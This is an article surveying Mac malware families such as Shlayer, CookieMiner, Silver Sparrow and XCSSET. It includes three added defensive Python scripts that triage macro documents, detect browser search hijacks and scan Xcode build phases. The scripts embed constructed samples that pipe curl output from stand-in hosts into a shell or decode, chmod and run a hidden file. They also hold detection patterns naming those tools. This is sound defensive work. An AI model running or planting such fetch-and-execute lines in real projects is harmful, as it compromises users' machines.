A decade ago, malware targeting Apple devices was too rare to take seriously and did not measure up to Windows threats in either quantity or sophistication. This was partly due to the Mac's relatively low market share, which gave cybercriminals little incentive to invest in that niche.
A lot has changed since then. The growing popularity of Macs and iDevices around the world made criminals rethink their priorities. According to Malwarebytes' 2020 State of Malware report, the average Mac endpoint saw 11 threat detections in 2019, almost twice the figure for Windows PCs (5.8).
The complexity of these threats has grown as well. Persistent browser hijackers, adware, cryptocurrency miners and file-encrypting ransomware have become the norm in this ecosystem despite Apple's efforts to fend them off. The following paragraphs describe notorious strains of malicious code that target Apple devices.
Originally tailored to Windows machines, malicious Visual Basic for Applications (VBA) macros are increasingly common in the Mac threat landscape, since Microsoft Office for Mac runs them too. The scheme works like this: the operators send phishing emails with attachments that look like ordinary Word documents. When the recipient opens one, a decoy page asks them to click Enable Content so the "protected" text becomes readable. That click runs a macro that quietly fetches a second-stage payload and executes it. Office keeps macros disabled by default; leaving them that way, and treating any document that demands macros in order to be read as hostile, defeats the technique outright.
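A defender can triage such attachments before they reach a mailbox. The following Python script is an added example, not code from the original article: it opens an OOXML Word document, reports whether it carries a VBA project and a macro-enabled content type, and scans the project blob for auto-execution names and shell or download calls. The `.docm` it inspects is constructed in memory as a stand-in for a real attachment, and the keyword lists are assumptions a practitioner would tune.

```python
"""Triage an OOXML Word document for an embedded VBA project.

Added example, not code from the original article. The sample document
built by build_sample() is constructed in memory; real files come from Office."""
import io
import re
import zipfile

MACRO_PART = "word/vbaProject.bin"
MACRO_CONTENT_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_CONTENT_TYPE = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
# Procedure names that run without a click, and calls that reach out or spawn a shell.
AUTO_EXEC = re.compile(rb"Auto_?Open|Document_Open|AutoExec|Workbook_Open", re.I)
SUSPICIOUS = re.compile(rb"\bShell\b|MacScript|AppleScriptTask|curl |python |osascript|system\(", re.I)


def triage_word_document(data):
    """Return what the file contains; the caller decides on blocking or quarantine."""
    result = {"has_vba": False, "macro_enabled_type": False, "auto_exec": [], "suspicious": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if "[Content_Types].xml" in names:
            result["macro_enabled_type"] = MACRO_CONTENT_TYPE.encode() in zf.read("[Content_Types].xml")
        if MACRO_PART in names:
            result["has_vba"] = True
            blob = zf.read(MACRO_PART)
            # Caveat: Office stores module source MS-OVBA-compressed, so a plain
            # string scan only sees what survives uncompressed (stream and
            # procedure names in the dir stream, short literals). For real
            # samples use a full parser such as oletools' olevba; the mere
            # presence of vbaProject.bin is already reason to hold the file.
            result["auto_exec"] = sorted({m.decode().lower() for m in AUTO_EXEC.findall(blob)})
            result["suspicious"] = sorted({m.decode().strip().lower() for m in SUSPICIOUS.findall(blob)})
    return result


def verdict(result):
    if not result["has_vba"]:
        return "clean: no VBA project"
    if result["auto_exec"] and result["suspicious"]:
        return "block: auto-running macro with shell/network calls"
    return "review: VBA project present"


def build_sample(with_macro):
    """Constructed sample: a minimal .docm/.docx zip, not a real Office file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        ct = MACRO_CONTENT_TYPE if with_macro else PLAIN_CONTENT_TYPE
        zf.writestr("[Content_Types].xml",
                    '<Types><Override PartName="/word/document.xml" ContentType="%s"/></Types>' % ct)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Uncompressed stand-in for a macro that runs on open and shells out.
            zf.writestr(MACRO_PART, b"dir\x00ThisDocument\x00Sub AutoOpen()\x00"
                                    b"Shell \"curl http://example.invalid/p | sh\"\x00End Sub")
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (False, True):
        r = triage_word_document(build_sample(flag))
        print(verdict(r), r)
```

Run it against a real attachment with `triage_word_document(open(path, "rb").read())`; the verdict only escalates to "block" when an auto-run name and a shell or download call are both visible, so a "review" result still deserves a look with a proper VBA parser.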
Shlayer, also tracked as OSX/Shlayer, was first spotted in early 2018 and is still doing the rounds via booby-trapped "Adobe Flash Player" updates advertised on malicious or hacked websites. If a user takes the bait and installs the bundle, it drops adware along with a scareware program from the infamous Advanced Mac Cleaner family, which displays fake threat-detection alerts to dupe the user into buying its full version to fix nonexistent issues. Adobe ended support for Flash Player at the end of 2020, so any Flash update prompt on a Mac is a lure by definition.
CookieMiner is geared toward stealing victims' cryptocurrency wallet and exchange credentials. It lifts Google Chrome and Safari cookies associated with popular exchanges and wallet services such as Bitstamp, Coinbase and MyEtherWallet, on the theory that a valid session cookie lets the attacker skip the login and the second factor that protects it. CookieMiner also comes with a module that hijacks CPU resources to mine coins behind the user's back.
Bing/Yahoo Redirect Virus
Rerouting a victim's web browser to junk sites is one of the dominant cybercrime techniques affecting Macs. In some cases, though, the landing page is not malicious at all, as with the hijacker that redirects to Bing or Yahoo Search. The attackers' real objective is to monetize web traffic: the hijacker changes the browser's default search engine or homepage to an intermediary URL belonging to a shady advertising network, so every query is logged (and paid for) before it is bounced on to a legitimate search engine. Checking which search provider the browser is actually configured to use is therefore a better tell than the page the user ends up on.
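The check a practitioner would run on a suspect Mac, as an added example that is not part of the original article: it reads Chrome's `Preferences` JSON (on macOS under `~/Library/Application Support/Google/Chrome/Default/Preferences`) and flags a default search provider whose host is not a first-party search engine, plus any homepage or startup URL that points at the same intermediary host. `SAMPLE_PREFS`, `CLEAN_PREFS`, the allowlist and the `feed.example-hijack.invalid` domain are constructed for the example; search engines enforced by policy live outside this file and need a separate check.

```python
"""Spot a hijacked default search engine in a Chromium Preferences file.

Added example, not part of the original article. Key paths follow the
layout of Chrome's Preferences JSON; SAMPLE_PREFS and CLEAN_PREFS are
constructed stand-ins for that file."""
import json
from urllib.parse import urlparse

# First-party hosts that a legitimate default search provider points at
# (assumed allowlist, extend as needed). A hijacker's provider lives on
# some other host and only redirects to Bing or Yahoo after the ad
# network has logged the query.
LEGIT_SEARCH_HOSTS = {
    "www.google.com", "www.bing.com", "search.yahoo.com",
    "duckduckgo.com", "www.ecosia.org", "www.startpage.com",
}


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def check_search_settings(prefs):
    """Return a list of findings; an empty list means nothing looked off."""
    findings = []
    provider = prefs.get("default_search_provider_data", {}).get("template_url_data", {})
    url = provider.get("url", "")
    bad_host = host_of(url) if url and host_of(url) not in LEGIT_SEARCH_HOSTS else None
    if bad_host:
        findings.append("default search provider %r sends queries to %s"
                        % (provider.get("short_name", "?"), bad_host))
    if url and urlparse(url).scheme == "http":
        findings.append("search provider URL is plain http, queries travel in the clear")
    # Hijackers usually point homepage and startup pages at the same host,
    # which is a strong signal that does not fire on intranet homepages.
    if bad_host:
        candidates = [("homepage", prefs.get("homepage", ""))]
        candidates += [("startup URL", u) for u in prefs.get("session", {}).get("startup_urls", [])]
        for label, candidate in candidates:
            if candidate and host_of(candidate) == bad_host:
                findings.append("%s also points at %s" % (label, bad_host))
    return findings


def check_preferences_file(path):
    """Read a real Preferences file (plain JSON) and run the check on it."""
    with open(path, encoding="utf-8") as fh:
        return check_search_settings(json.load(fh))


# Constructed sample: what a redirect hijacker typically leaves behind.
SAMPLE_PREFS = {
    "default_search_provider_data": {"template_url_data": {
        "keyword": "search", "short_name": "Search",
        "url": "http://feed.example-hijack.invalid/?q={searchTerms}"}},
    "homepage": "http://feed.example-hijack.invalid/",
    "homepage_is_newtabpage": False,
    "session": {"restore_on_startup": 4,
                "startup_urls": ["http://feed.example-hijack.invalid/"]},
}

# Constructed sample: an untouched profile.
CLEAN_PREFS = {
    "default_search_provider_data": {"template_url_data": {
        "keyword": "google.com", "short_name": "Google",
        "url": "https://www.google.com/search?q={searchTerms}"}},
    "homepage_is_newtabpage": True,
    "session": {"restore_on_startup": 1, "startup_urls": []},
}

if __name__ == "__main__":
    for name, prefs in (("hijacked", SAMPLE_PREFS), ("clean", CLEAN_PREFS)):
        print(name, check_search_settings(prefs) or ["no findings"])
```

Quit Chrome before reading the live file so the JSON is complete, and remember that an extension with the `chrome_settings_overrides` permission can also own the search provider; removing the extension, not just editing the preference, is what stops the redirect coming back.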
OSX.Pirrit is multifunctional adware distributed mainly through cracked copies of mainstream applications such as Adobe Photoshop and Microsoft Office components. It injects superfluous ads into web pages and downloads other threats onto the Mac without the user's consent.
Designed to amass sensitive information, the MacDownloader malware peaked in 2017. It zeroed in on employees of high-profile organizations such as U.S. defense contractors. Once inside a Mac, it displayed a series of credential and permission prompts disguised as regular system dialogs. With the password obtained that way, it accessed the keychain, harvested the victim's stored credentials and sent them to its operators' command-and-control (C2) server.
Another coin miner, unleashed in 2018, gobbles up most if not all of the host Mac's processing power without throttling its CPU consumption. The resulting performance drain makes the computer almost unusable and causes serious overheating, which is usually what gives the infection away and may shorten the hardware's life.
Having started in the early 2010s as a Windows-only phenomenon, ransomware is now a firmly established type of predatory code on Macs. Since 2016 there have been several outbreaks involving the KeRanger, Patcher and MacRansom strains. In 2020, another sample, first called EvilQuest and later renamed ThiefQuest, jumped on the bandwagon; besides encrypting files it exfiltrates data and installs a keylogger. These pests encrypt victims' data or lock it inside a password-protected archive and then demand bitcoins for recovery.
In November 2020, Apple introduced the M1 system on a chip (SoC), marketing rock-solid security as one of its fundamental advantages. Three months later, researchers at Red Canary reported a malicious application called Silver Sparrow, one of the first malware families compiled to run natively on Apple silicon. At that point its traces had been found on about 29,000 Macs. It arrived as a macOS installer package, set up persistence and checked in with a remote C2 server for instructions; no final payload was ever observed, which means its operators could have pushed arbitrary code to infected machines at any time.
XCSSET debuted in August 2020 and stands out due to its distribution quirks and adverse effects. It attached itself to Xcode projects shared by unsuspecting developers, so its malicious build script ran on every machine that built the project and spread further through GitHub repositories. Its authors also abused zero-day vulnerabilities in macOS and Safari to get around sandboxing and privacy protections. After infiltration, the strain injects code into browser sessions, takes screenshots of what the victim is doing and collects personally identifiable data. To add insult to injury, it carries an encryption component and can hold files for ransom. Reviewing the run-script build phases of any third-party Xcode project before building it is the practical defense.
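An infected Xcode project carries its payload in a run-script build phase, so that is the place to look before building someone else's project. As an added example, not the article's or Apple's code, the script below pulls every `PBXShellScriptBuildPhase` out of a `project.pbxproj`, unescapes the `shellScript` string and reports phases that download, decode, execute or touch hidden paths. The sample project text, its object identifiers and the `updates.example.invalid` host are constructed, and the indicators are heuristics that will also flag some legitimate build tooling.

```python
"""Scan an Xcode project.pbxproj for run-script build phases that fetch or
execute code.

Added example, not the article's or Apple's code. SAMPLE_PBXPROJ is a
constructed project file; the indicator patterns are heuristics."""
import re

# A pbxproj object looks like:  ID /* comment */ = { isa = ...; ...; };
PHASE_RE = re.compile(r"(\w+) /\* [^*]* \*/ = \{(.*?)\};", re.S)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.S)
UNESCAPE = {r"\n": "\n", r"\t": "\t", r"\"": '"', r"\\": "\\"}
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads from the network"),
    (re.compile(r"base64\s+(-d|-D|--decode)"), "decodes an embedded payload"),
    (re.compile(r"\bosascript\b"), "runs AppleScript"),
    (re.compile(r"\b(eval|sh|bash|zsh)\s+-c\b|\|\s*(sh|bash|zsh)\b"), "pipes text into a shell"),
    (re.compile(r"(^|[\s\"'/])\.[A-Za-z]"), "touches a hidden path"),  # e.g. ${SRCROOT}/.xcassets
    (re.compile(r"\bchmod\s+\+x\b"), "makes a file executable"),
]


def unescape(s):
    """Undo the backslash escapes pbxproj uses inside quoted strings."""
    return re.sub(r'\\[nt"\\]', lambda m: UNESCAPE[m.group(0)], s)


def scan_pbxproj(text):
    """Return (phase_id, script, reasons) for every suspicious run-script phase."""
    hits = []
    for phase_id, body in PHASE_RE.findall(text):
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        m = SCRIPT_RE.search(body)
        if not m:
            continue
        script = unescape(m.group(1))
        reasons = [why for rx, why in INDICATORS if rx.search(script)]
        if reasons:
            hits.append((phase_id, script, reasons))
    return hits


def scan_project_file(path):
    with open(path, encoding="utf-8") as fh:
        return scan_pbxproj(fh.read())


# Constructed sample: one ordinary lint phase and one planted phase that
# fetches a blob into a hidden folder and runs it.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		A1B2C3D4E5F60718293A4B5C /* Run SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		0F0E0D0C0B0A090807060504 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "curl -fsSL http://updates.example.invalid/x | base64 -d > \"${SRCROOT}/.xcassets/.x\"\nchmod +x \"${SRCROOT}/.xcassets/.x\" && \"${SRCROOT}/.xcassets/.x\"\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

if __name__ == "__main__":
    for phase_id, script, reasons in scan_pbxproj(SAMPLE_PBXPROJ):
        print(phase_id, reasons)
        print("   ", script.strip().replace("\n", "\n    "))
```

Point `scan_project_file()` at `YourApp.xcodeproj/project.pbxproj` of any project you did not write yourself; a hit is not proof of infection, but a build phase that downloads and executes something is not what a lint or versioning script looks like, and it deserves a read before Xcode runs it for you.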
Apple is trying to stay ahead of the game. The prominent building blocks of its defensive barrier include the signature-based XProtect anti-malware, Gatekeeper (which enforces code signing and notarization on downloaded apps), the M1 architecture and the Secure Enclave, which protects keys and credentials. But let's face it: cybercriminals are agile enough to get around these mechanisms, most often by talking the user into overriding them. Therefore, instead of relying solely on built-in protection, users should exercise caution with dubious websites and suspicious downloads, and should never click through a Gatekeeper warning to run an "update" they did not go looking for.